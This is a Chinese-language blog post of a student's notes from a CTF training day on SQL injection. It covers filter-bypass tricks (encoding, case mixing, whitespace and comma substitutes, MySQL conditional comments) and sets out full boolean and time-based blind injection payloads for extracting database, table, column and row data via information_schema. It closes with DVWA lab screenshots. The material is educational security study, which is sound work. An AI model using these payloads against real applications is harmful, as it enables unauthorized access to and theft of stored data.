<!DOCTYPE html>
<html>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。">
<meta name="keywords" content="Bin,ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="集训的第四天：有关SQL绕过和盲注">
<meta property="og:url" content="http://yoursite.com/2018/07/04/second/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.imgur.com/wipqu8f.png">
<meta property="og:image" content="https://i.imgur.com/CWs7k2j.png">
<meta property="og:image" content="https://i.imgur.com/nxU5Hok.png">
<meta property="og:image" content="https://i.imgur.com/Bt7IlV5.png">
<meta property="og:image" content="https://i.imgur.com/hlxBWLo.png">
<meta property="og:image" content="https://i.imgur.com/qAlqEWN.png">
<meta property="og:image" content="https://i.imgur.com/Q39C0lF.png">
<meta property="og:image" content="https://i.imgur.com/MAwHYCM.png">
<meta property="og:updated_time" content="2018-07-04T15:08:32.426Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="集训的第四天：有关SQL绕过和盲注">
<meta name="twitter:description" content="学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。">
<meta name="twitter:image" content="https://i.imgur.com/wipqu8f.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>集训的第四天：有关SQL绕过和盲注</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2018/07/05/third/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2018/07/04/hello-world/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2018/07/04/second/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2018/07/04/second/&text=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2018/07/04/second/&is_video=false&description=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=集训的第四天：有关SQL绕过和盲注&body=Check out this article: http://yoursite.com/2018/07/04/second/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2018/07/04/second/&name=集训的第四天：有关SQL绕过和盲注&description=&lt;p&gt;学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#数字型SQL注入"><span class="toc-number">1.</span> <span class="toc-text">数字型SQL注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#如何绕过过滤"><span class="toc-number">1.1.</span> <span class="toc-text">如何绕过过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#运用编码技术绕过"><span class="toc-number">1.1.1.</span> <span class="toc-text">运用编码技术绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ASCII码"><span class="toc-number">1.1.1.1.</span> <span class="toc-text">ASCII码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#URL编码"><span class="toc-number">1.1.1.2.</span> <span class="toc-text">URL编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#重复："><span class="toc-number">1.1.1.3.</span> <span class="toc-text">重复：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#大小写交替："><span class="toc-number">1.1.1.4.</span> <span class="toc-text">大小写交替：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#空格的绕过"><span class="toc-number">1.1.1.5.</span> <span class="toc-text">空格的绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#关键表名过滤绕过"><span class="toc-number">1.1.1.6.</span> <span class="toc-text">关键表名过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤等号"><span class="toc-number">1.1.1.7.</span> <span class="toc-text">过滤等号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤引号"><span class="toc-number">1.1.1.8.</span> <span class="toc-text">过滤引号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤大于小于号"><span class="toc-number">1.1.1.9.</span> <span class="toc-text">过滤大于小于号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤逗号"><span class="toc-number">1.1.1.10.</span> <span class="toc-text">过滤逗号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SLEEP函数中不能用数字"><span class="toc-number">1.1.1.11.</span> <span class="toc-text">SLEEP函数中不能用数字</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤注释符（-、-–-）"><span class="toc-number">1.1.1.12.</span> <span class="toc-text">过滤注释符（#、 –+）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#采用重复的技术绕过"><span class="toc-number">1.1.1.13.</span> <span class="toc-text">采用重复的技术绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用等价函数"><span class="toc-number">1.1.1.14.</span> <span class="toc-text">利用等价函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MYSQL条件注释利用"><span class="toc-number">1.1.1.15.</span> <span class="toc-text">MYSQL条件注释利用</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#盲注"><span class="toc-number">2.</span> <span class="toc-text">盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#布尔盲注"><span class="toc-number">2.1.</span> <span class="toc-text">布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#判断是否有盲注点"><span class="toc-number">2.1.1.</span> <span class="toc-text">判断是否有盲注点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#猜解库名、表名、列名、内容"><span class="toc-number">2.1.2.</span> <span class="toc-text">猜解库名、表名、列名、内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#时间盲注"><span class="toc-number">2.2.</span> <span class="toc-text">时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#判断是否有盲注点-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">判断是否有盲注点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#猜解库名、表名、列名、内容-1"><span class="toc-number">2.2.2.</span> <span class="toc-text">猜解库名、表名、列名、内容</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#上课的DVWA题"><span class="toc-number">3.</span> <span class="toc-text">上课的DVWA题</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
    <a href="https://github.com/Shmilylbj"><img style="position: absolute; top: 0; left: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_left_darkblue_121621.png" alt="Fork me on GitHub"></a>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        集训的第四天：有关SQL绕过和盲注
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Hexo</span>
      </span>
      
    <div class="postdate">
        <time datetime="2018-07-04T06:20:00.000Z" itemprop="datePublished">2018-07-04</time>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Bin/">Bin</a>, <a class="tag-link" href="/tags/ctf/">ctf</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。</p>
<a id="more"></a>
<h1 id="数字型SQL注入"><a href="#数字型SQL注入" class="headerlink" title="数字型SQL注入"></a>数字型SQL注入</h1><p>SQL注入的过程中有些特定的字符或者字符串会被过滤，数据库无法了解正确的查询语句。</p>
<h2 id="如何绕过过滤"><a href="#如何绕过过滤" class="headerlink" title="如何绕过过滤"></a>如何绕过过滤</h2><h3 id="运用编码技术绕过"><a href="#运用编码技术绕过" class="headerlink" title="运用编码技术绕过"></a>运用编码技术绕过</h3><h4 id="ASCII码"><a href="#ASCII码" class="headerlink" title="ASCII码"></a>ASCII码</h4><p>CHAR(101, 97, 115, 116)等价于east</p>
<h4 id="URL编码"><a href="#URL编码" class="headerlink" title="URL编码"></a>URL编码</h4><p>0x61646D696E等价于admin</p>
<h4 id="重复："><a href="#重复：" class="headerlink" title="重复："></a>重复：</h4><p>例如 ：seleselectct和admadminin</p>
<h4 id="大小写交替："><a href="#大小写交替：" class="headerlink" title="大小写交替："></a>大小写交替：</h4><p>例如：SeLEct和UnIOn</p>
<h4 id="空格的绕过"><a href="#空格的绕过" class="headerlink" title="空格的绕过"></a>空格的绕过</h4><p>用两个空格或者TAB代替</p>
<p>%a0代替</p>
<p>/**/代替</p>
<p>用括号()代替</p>
<p>用+代替</p>
<p>用花括号{}代替</p>
<p>用单引号或双引号代替</p>
<h4 id="关键表名过滤绕过"><a href="#关键表名过滤绕过" class="headerlink" title="关键表名过滤绕过"></a>关键表名过滤绕过</h4><p>information_schema(这里空格).(这里空格)tables</p>
<h4 id="过滤等号"><a href="#过滤等号" class="headerlink" title="过滤等号"></a>过滤等号</h4><p>用like</p>
<h4 id="过滤引号"><a href="#过滤引号" class="headerlink" title="过滤引号"></a>过滤引号</h4><p>0x7573657273即等于”users”</p>
<h4 id="过滤大于小于号"><a href="#过滤大于小于号" class="headerlink" title="过滤大于小于号"></a>过滤大于小于号</h4><p>函数greatest()和least()分别替代(&gt;)和(&lt;)</p>
<p>例如：</p>
<p>select * from users where id=1 and ascii(substr(database(),1,1))&gt;64</p>
<p><code>`</code> </p>
<p>等价于</p>
<p><code>`</code>mysql</p>
<p>select * from users where id=1 and greatest(ascii(substr(database(),1,1)),64)=64</p>
<h4 id="过滤逗号"><a href="#过滤逗号" class="headerlink" title="过滤逗号"></a>过滤逗号</h4><p>substr(str,1,1）</p>
<p>等价于</p>
<p>substr(str from 1 for 1)</p>
<h4 id="SLEEP函数中不能用数字"><a href="#SLEEP函数中不能用数字" class="headerlink" title="SLEEP函数中不能用数字"></a>SLEEP函数中不能用数字</h4><p>用pi()和ceil()过滤</p>
<p>sleep(ceil(pi()))</p>
<h4 id="过滤注释符（-、-–-）"><a href="#过滤注释符（-、-–-）" class="headerlink" title="过滤注释符（#、 –+）"></a>过滤注释符（#、 –+）</h4><p>用闭合的方式：</p>
<p>1’ and ‘1</p>
<h4 id="采用重复的技术绕过"><a href="#采用重复的技术绕过" class="headerlink" title="采用重复的技术绕过"></a>采用重复的技术绕过</h4><p>宽字节注入</p>
<p>order by被过滤</p>
<p>使用into变量来绕过：</p>
<p>select * from users limit 1,1 into @a,@b,@c</p>
<h4 id="利用等价函数"><a href="#利用等价函数" class="headerlink" title="利用等价函数"></a>利用等价函数</h4><p>hex()、bin() ==&gt; ascii()</p>
<p>sleep() ==&gt; benchmark()</p>
<p>concat_ws() ==&gt; group_concat()</p>
<p>mid()、substr()==&gt; substring()</p>
<p>@@user ==&gt; user()</p>
<p>@@datadir ==&gt; datadir()</p>
<h4 id="MYSQL条件注释利用"><a href="#MYSQL条件注释利用" class="headerlink" title="MYSQL条件注释利用"></a>MYSQL条件注释利用</h4><p>/<em>!..</em>/</p>
<p>以上语句在其他数据库中不执行，但在MYSQL中执行</p>
<p>/<em>!50000…</em>/</p>
<p>以上语句在50000版本以上不执行，否则必执行，用于过滤正则表达式</p>
<h1 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h1><p>SQL盲注常用函数：</p>
<p>if和case when：用于时间盲注</p>
<p>substring、substr、mid等：用于截断字符串</p>
<p>ascii：使字符变成ASCII码</p>
<p>limit offset：用于猜取内容</p>
<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><p>即只有TRUE和FALSE两种状态，过程中需要猜测，直到正确为止</p>
<h3 id="判断是否有盲注点"><a href="#判断是否有盲注点" class="headerlink" title="判断是否有盲注点"></a>判断是否有盲注点</h3><p>1’ and 1=1 # 返回TRUE</p>
<p>1’ and 1=2 # 返回FALSE，并且没有返回</p>
<p>即SQL语句执行成功和失败的返回界面存在某种固定的差异</p>
<h3 id="猜解库名、表名、列名、内容"><a href="#猜解库名、表名、列名、内容" class="headerlink" title="猜解库名、表名、列名、内容"></a>猜解库名、表名、列名、内容</h3><p>1’ and substr(database(),1,1)=’a’ # 猜解库名</p>
<p>1’ and substr((select group_concat(table_name) from information_schema.tables where table_schema=’DatabaseName’),1,1)=’a’ # 猜解表名</p>
<p>1’ and substr((select group_concat(column_name) from information_schema.columns where table_name=’TableName’),1,1)=’a’ # 猜解列名</p>
<p>1’ and substr((select group_concat(SomeThing) from DatabaseName.TableName),1,1)=’a’ # 猜解表名</p>
<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><p>即对一个命令只有一个固定的反应，如果是正确的就会等待一定的时间再反应，如果错误立即反应</p>
<h3 id="判断是否有盲注点-1"><a href="#判断是否有盲注点-1" class="headerlink" title="判断是否有盲注点"></a>判断是否有盲注点</h3><p>1’ and if(1=1,sleep(5),1) # 延迟返回为TRUE</p>
<p>1’ and if(1=2,sleep(5),1) # 不延迟返回为FALSE</p>
<p>基本与布尔盲注类似</p>
<h3 id="猜解库名、表名、列名、内容-1"><a href="#猜解库名、表名、列名、内容-1" class="headerlink" title="猜解库名、表名、列名、内容"></a>猜解库名、表名、列名、内容</h3><p>1’ and if((substr(database(),1,1)=’a’),sleep(5),1) # 猜解库名</p>
<p>1’ and if((substr((select group_concat(table_name) from information_schema.tables where table_schema=’DatabaseName’),1,1)=’a’),sleep(5),1) # 猜解表名</p>
<p>1’ and if((substr((select group_concat(column_name) from information_schema.columns where table_name=’TableName’),1,1)=’a’),sleep(5),1) # 猜解列名</p>
<p>1’ and if((substr((select group_concat(SomeThing) from DatabaseName.TableName),1,1)=’a’),sleep(5),1) # 猜解表名</p>
<h1 id="上课的DVWA题"><a href="#上课的DVWA题" class="headerlink" title="上课的DVWA题"></a>上课的DVWA题</h1><p>以下为猜解过程：</p>
<p><img src="https://i.imgur.com/wipqu8f.png" alt=""></p>
<p><img src="https://i.imgur.com/CWs7k2j.png" alt=""></p>
<p><img src="https://i.imgur.com/nxU5Hok.png" alt=""></p>
<p><img src="https://i.imgur.com/Bt7IlV5.png" alt=""></p>
<p><img src="https://i.imgur.com/hlxBWLo.png" alt=""></p>
<p><img src="https://i.imgur.com/qAlqEWN.png" alt=""></p>
<p><img src="https://i.imgur.com/Q39C0lF.png" alt=""></p>
<p><img src="https://i.imgur.com/MAwHYCM.png" alt=""></p>

  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#数字型SQL注入"><span class="toc-number">1.</span> <span class="toc-text">数字型SQL注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#如何绕过过滤"><span class="toc-number">1.1.</span> <span class="toc-text">如何绕过过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#运用编码技术绕过"><span class="toc-number">1.1.1.</span> <span class="toc-text">运用编码技术绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ASCII码"><span class="toc-number">1.1.1.1.</span> <span class="toc-text">ASCII码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#URL编码"><span class="toc-number">1.1.1.2.</span> <span class="toc-text">URL编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#重复："><span class="toc-number">1.1.1.3.</span> <span class="toc-text">重复：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#大小写交替："><span class="toc-number">1.1.1.4.</span> <span class="toc-text">大小写交替：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#空格的绕过"><span class="toc-number">1.1.1.5.</span> <span class="toc-text">空格的绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#关键表名过滤绕过"><span class="toc-number">1.1.1.6.</span> <span class="toc-text">关键表名过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤等号"><span class="toc-number">1.1.1.7.</span> <span class="toc-text">过滤等号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤引号"><span class="toc-number">1.1.1.8.</span> <span class="toc-text">过滤引号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤大于小于号"><span class="toc-number">1.1.1.9.</span> <span class="toc-text">过滤大于小于号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤逗号"><span class="toc-number">1.1.1.10.</span> <span class="toc-text">过滤逗号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SLEEP函数中不能用数字"><span class="toc-number">1.1.1.11.</span> <span class="toc-text">SLEEP函数中不能用数字</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#过滤注释符（-、-–-）"><span class="toc-number">1.1.1.12.</span> <span class="toc-text">过滤注释符（#、 –+）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#采用重复的技术绕过"><span class="toc-number">1.1.1.13.</span> <span class="toc-text">采用重复的技术绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用等价函数"><span class="toc-number">1.1.1.14.</span> <span class="toc-text">利用等价函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MYSQL条件注释利用"><span class="toc-number">1.1.1.15.</span> <span class="toc-text">MYSQL条件注释利用</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#盲注"><span class="toc-number">2.</span> <span class="toc-text">盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#布尔盲注"><span class="toc-number">2.1.</span> <span class="toc-text">布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#判断是否有盲注点"><span class="toc-number">2.1.1.</span> <span class="toc-text">判断是否有盲注点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#猜解库名、表名、列名、内容"><span class="toc-number">2.1.2.</span> <span class="toc-text">猜解库名、表名、列名、内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#时间盲注"><span class="toc-number">2.2.</span> <span class="toc-text">时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#判断是否有盲注点-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">判断是否有盲注点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#猜解库名、表名、列名、内容-1"><span class="toc-number">2.2.2.</span> <span class="toc-text">猜解库名、表名、列名、内容</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#上课的DVWA题"><span class="toc-number">3.</span> <span class="toc-text">上课的DVWA题</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2018/07/04/second/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2018/07/04/second/&text=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2018/07/04/second/&is_video=false&description=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=集训的第四天：有关SQL绕过和盲注&body=Check out this article: http://yoursite.com/2018/07/04/second/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2018/07/04/second/&title=集训的第四天：有关SQL绕过和盲注"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2018/07/04/second/&name=集训的第四天：有关SQL绕过和盲注&description=&lt;p&gt;学姐今天给我们讲解了有关SQL绕过和盲注的知识。我们动手操作了几次实验。&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    Copyright &copy; 2018 John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>
<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


